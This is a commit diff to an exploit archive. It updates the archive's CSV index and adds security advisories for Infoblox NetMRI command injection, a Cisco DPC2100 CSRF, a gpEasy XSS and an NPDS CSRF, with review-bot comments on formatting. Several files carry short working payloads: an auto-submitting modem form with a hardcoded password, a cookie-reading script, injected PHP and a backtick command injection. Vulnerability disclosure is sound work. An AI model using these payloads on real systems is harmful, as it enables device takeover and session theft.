Updated 07_12_2014

Offensive Security 2014-07-12 04:39:14 +00:00
parent 96dfb9b9da
commit 7d14cd14d8
6 changed files with 107 additions and 2 deletions


@ -19488,7 +19488,7 @@ id,file,description,date,author,platform,type,port
22259,platforms/linux/dos/22259.c,"BitchX 1.0 Malformed RPL_NAMREPLY Denial of Service Vulnerability",2003-01-30,argv,linux,dos,0
22260,platforms/cgi/webapps/22260.c,"cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (1)",2003-02-19,bob,cgi,webapps,0
22261,platforms/cgi/webapps/22261.pl,"cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (2)",2003-02-19,CaMaLeoN,cgi,webapps,0
22262,platforms/cgi/webapps/22262.pl,"cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (3)",2003-02-19,SPAX,cgi,webapps,0
22262,platforms/cgi/webapps/22262.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution Vulnerability (3)",2003-02-19,SPAX,cgi,webapps,0
22263,platforms/cgi/webapps/22263.pl,"cPanel 5.0 Guestbook.cgi Remote Command Execution Vulnerability (4)",2003-02-19,pokleyzz,cgi,webapps,0
22264,platforms/linux/remote/22264.txt,"OpenSSL 0.9.x CBC Error Information Leakage Weakness",2003-02-19,"Martin Vuagnoux",linux,remote,0
22265,platforms/linux/local/22265.pl,"cPanel 5.0 Openwebmail Local Privileges Escalation Vulnerability",2003-02-19,deadbeat,linux,local,0
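Review bot: the 22262 description gains the ' - ' separator between product and title, but the other cPanel 5.0 entries in the same context (22260, 22261, 22263 and 22265) keep the old form without it, so this one-line edit leaves the block inconsistent; apply the same separator to all five in this commit, e.g. `cPanel 5.0 - Guestbook.cgi Remote Command Execution Vulnerability (1)`.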
@ -28623,7 +28623,7 @@ id,file,description,date,author,platform,type,port
31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 - post3/Book.asp review Parameter XSS",2008-05-26,Unohope,asp,webapps,0
31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 - post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 - post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0
31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager - Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0
31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager 11.0, 12.0, 12.1 - Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0
31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 - 'sentout.asp' Unauthorized Access Vulnerability",2008-05-26,Unohope,asp,webapps,0
31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 - 'news.php' Cross-Site Scripting Vulnerability",2008-05-27,ZoRLu,php,webapps,0
31856,platforms/windows/dos/31856.html,"CA Internet Security Suite - 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2008-05-28,Nine:Situations:Group,windows,dos,0
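Review bot: adding the affected versions ('11.0, 12.0, 12.1') to 31853 is the right fix; while this region is being edited, note that the context lines 31850 and 31852 spell the same script as `post3/Book.asp` and `post3/book.asp`, and the two descriptions should be normalised to one spelling, the one used in the original advisory.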
@ -30647,3 +30647,7 @@ id,file,description,date,author,platform,type,port
34027,platforms/solaris/dos/34027.txt,"Sun Solaris 10 Nested Directory Tree Local Denial of Service Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34028,platforms/solaris/dos/34028.txt,"Sun Solaris 10 'in.ftpd' Long Command Handling Security Vulnerability",2010-05-21,"Maksymilian Arciemowicz",solaris,dos,0
34029,platforms/php/webapps/34029.txt,"Specialized Data Systems Parent Connect 2010.04.11 Multiple SQL Injection Vulnerabilities",2010-05-21,epixoip,php,webapps,0
34030,platforms/lin_x86/webapps/34030.txt,"Infoblox 6.8.2.11 - OS Command Injection",2014-07-10,"Nate Kettlewell",lin_x86,webapps,0
34031,platforms/php/webapps/34031.txt,"gpEasy CMS 1.6.2 'editing_files.php' Cross Site Scripting Vulnerability",2010-05-18,"High-Tech Bridge SA",php,webapps,0
34032,platforms/php/webapps/34032.txt,"NPDS Revolution 10.02 'admin.php' Cross-Site Request Forgery Vulnerability",2010-05-20,"High-Tech Bridge SA",php,webapps,0
34033,platforms/hardware/remote/34033.html,"Cisco DPC2100 2.0.2 r1256-060303 Multiple Security Bypass and Cross-Site Request Forgery Vulnerabilities",2010-05-24,"Dan Rosenberg",hardware,remote,0
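Review bot: the four new entries do not follow one description format: 34030 uses the `Product Version - Title` style (`Infoblox 6.8.2.11 - OS Command Injection`) while 34031, 34032 and 34033 run product, version and title together without the ' - ' separator. Pick one form for all four; the 22262 edit earlier in this commit suggests the separated form is the target style.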

Can't render this file because it is too large.


@ -6,6 +6,8 @@ An attacker may exploit this vulnerability to execute commands in the security c
This vulnerability has been reported to affect cPanel version 5, previous versions may also be affected.
#####################################################
# cpanel-plus.pl exploit
# Spawn bash style Shell on Apache CPANEL
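Review bot: the header `@ -6,6 +6,8 @@` records two added lines in this file, but the rendering shows the six lines without +/- markers, so a reader cannot tell from the page which lines are new; the raw diff should be checked to confirm that only the advisory text above the `#####` banner changed and that the script body starting at `# cpanel-plus.pl exploit` is untouched.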


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40346/info
Cisco DPC2100 (formerly Scientific Atlanta DPC2100) is prone to multiple security-bypass and cross-site request-forgery vulnerabilities.
Successful exploits may allow attackers to run privileged commands on the affected device, change configuration settings, modify device firmware, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.
Firmware versions prior to 2.0.2.r1256-100324as are vulnerable.
<html> <head> <title>Test for CSRF vulnerability in WebSTAR modems</title> </head> <body> <form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl"> <input type="hidden" name="SAAccessLevel" value="0"> <input type="hidden" name="SAPassword" value="W2402"> </form> <script>document.csrf.submit()</script> </body> </html>
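Review bot: the whole HTML proof of concept is collapsed onto a single line, which makes the form fields (`SAAccessLevel`, `SAPassword`) hard to review and will make later diffs unreadable; store it with one element per line, as 34031.txt in this same commit does. The version string here ('prior to 2.0.2.r1256-100324as') also differs from the one in the csv description for 34033 ('2.0.2 r1256-060303'); if the csv gives the tested version rather than the fixed one, a line in the file header saying so would avoid the apparent mismatch.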


@ -0,0 +1,64 @@
Product: Network Automation, licensed as:
• NetMRI
• Switch Port Manager
• Automation Change Manager
• Security Device Controller
Vendor: Infoblox
Vulnerable Version(s): 6.4.X.X-6.8.4.X
Tested Version: 6.8.2.11
Vendor Notification: May 12th, 2014
Vendor Patch Availability to Customers: May 16th, 2014
Public Disclosure: July 9th, 2014
Vulnerability Type: OS Command Injection [CWE-78]
CVE Reference: CVE-2014-3418
Risk Level: High
CVSSv2 Base Score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status: Solution Available
Discovered and Provided: Nate Kettlewell, Depth Security ( https://www.depthsecurity.com/ )
------------------------------------------------------------------------
-----------------------
Advisory Details:
Depth Security discovered a vulnerability in the Infoblox Network Automation management web interface. This attack does not require authentication of any kind.
1) OS Command Injection in Infoblox Network Automation Products: CVE-2014-3418
The vulnerability exists due to insufficient sanitization of user-supplied data in in skipjackUsername POST parameter. A remote attacker can inject operating system commands as the root user, and completely compromise the operating system.
The following is the relevant portion of the multipart/form-data POST request to netmri/config/userAdmin/login.tdf
Content-Disposition: form-data; name="skipjackUsername"
admin`ping -n 20 127.0.0.1`
------------------------------------------------------------------------
-----------------------
Solution:
Infoblox immediately released a hotfix to remediate this vulnerability on existing installations (v6.X-NETMRI-20710.gpg).
The flaw was corrected in the 6.8.5 release (created expressly for dealing with this issue), and that release has been put into manufacturing for new appliances.
------------------------------------------------------------------------
-----------------------
Proof of Concept:
In addition to manual exploitation via the above mentioned vector, proof of concept is provided in the form of a module for the metasploit framework.
https://github.com/depthsecurity/NetMRI-2014-3418
------------------------------------------------------------------------
-----------------------
References:
[1] Depth Security Advisory - http://blog.depthsecurity.com/2014/07/os-command-injection-in-infoblox-netmri.html - OS Command Injection in NetMRI.
[2] NetMRI - http://www.infoblox.com/products/network-automation/netmri - NetMRI is an Enterprise Network Management Appliance.
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org/ - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] NetMRI Metasploit Module - https://github.com/depthsecurity/NetMRI-2014-3418
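Review bot: two text defects in the new advisory: the sentence 'insufficient sanitization of user-supplied data in in skipjackUsername POST parameter' doubles 'in', and each separator rule has been wrapped into a long dash line followed by a short one, which looks like a mail-client line break rather than intentional formatting; join each pair into a single line. The Solution section names the hotfix (`v6.X-NETMRI-20710.gpg`) and the fixed release (6.8.5), so the header's 'Vulnerable Version(s): 6.4.X.X-6.8.4.X' could state explicitly that 6.8.5 and later are not affected.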

platforms/php/webapps/34031.txt  Executable file, 15 additions

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/40330/info
gpEasy CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to gpEasy CMS 1.6.3 are vulnerable
<form method="POST" action="http://example.com/index.php/Home" name="myfrm">
<input type="hidden" name="cmd" value=&#039;save&#039;>
<input type="hidden" name="gpcontent" value=&#039;text"><script>alert(document.cookie)</script>&#039;>
</form>
<script>
document.myfrm.submit();
</script>
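Review bot: the form's attribute values are written with HTML entities (`value=&#039;save&#039;`), which is the escaped rendering of single quotes copied from a web page rather than the text of the original advisory, so the archived file does not match its source and should be taken from the raw advisory; also 'Versions prior to gpEasy CMS 1.6.3 are vulnerable' is missing its full stop.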

platforms/php/webapps/34032.txt  Executable file, 11 additions

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/40331/info
NPDS Revolution is prone to a cross-site request-forgery vulnerability.
Attackers can exploit this issue to compromise the affected application, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. Other attacks may also be possible.
NPDS Revolution 10.02 is vulnerable; prior versions may also be affected.
The following example request is available:
<img src="http://www.example.com/admin.php?op=ConfigFiles_save&Xtxt=<?+phpinfo()+?>&Xfiles=footer_after&confirm=1">